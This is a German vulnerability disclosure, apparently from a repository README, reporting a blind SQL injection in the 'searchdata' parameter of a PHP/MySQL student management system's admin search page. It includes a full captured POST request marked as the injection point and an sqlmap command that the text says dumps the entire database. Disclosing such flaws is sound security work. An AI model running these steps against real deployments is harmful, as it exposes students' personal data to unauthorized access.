
Studentenverwaltungssystem mit PHP und MySQL
Das Student Management System (SMS) ist eine Webanwendung, die mit PHP und MySQL entwickelt wurde und zur Verwaltung von Studenteninformationen dient. Dieses Repository enthält den Quellcode und die Details des Systems sowie einen Sicherheitslückenbericht.
Prüfer:
Shoaib Alam - LinkedIn-Profil
Eine Blind-SQL-Injection-Sicherheitslücke wurde im Student Management System entdeckt. Dieses Problem betrifft den Parameter searchdata in der Suchfunktion der Anwendung.
/studentms/admin/search.phpsearchdataDer Parameter searchdata ist aufgrund unzureichender Eingabebereinigung anfällig für Blind SQL Injection. Ein Angreifer könnte diese Sicherheitslücke ausnutzen, indem er bösartige SQL-Abfragen in die searchdata-Eingabe injiziert und sich dadurch möglicherweise unbefugten Zugriff auf die Datenbank oder andere sensible Informationen verschafft.
/studentms/admin/search.php
POST /studentms/admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://localhost/studentms/admin/search.php
Cookie: PHPSESSID=kq90r1jv25kn4flrqd74v1miqd
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
searchdata=*&search=
Speichern Sie die obige POST-Anfrage mit Notepad oder einem beliebigen Texteditor in req.txt.
Verwenden Sie ein Tool wie SQLMAP, um das Obige auszunutzen, indem Sie diesen Befehl anwenden (Sie können Ihren eigenen anpassen): sqlmap -r req.txt --dbs --random-agent --level 3 --risk 3
Der obige Befehl gibt die gesamte Datenbank der Webanwendung aus.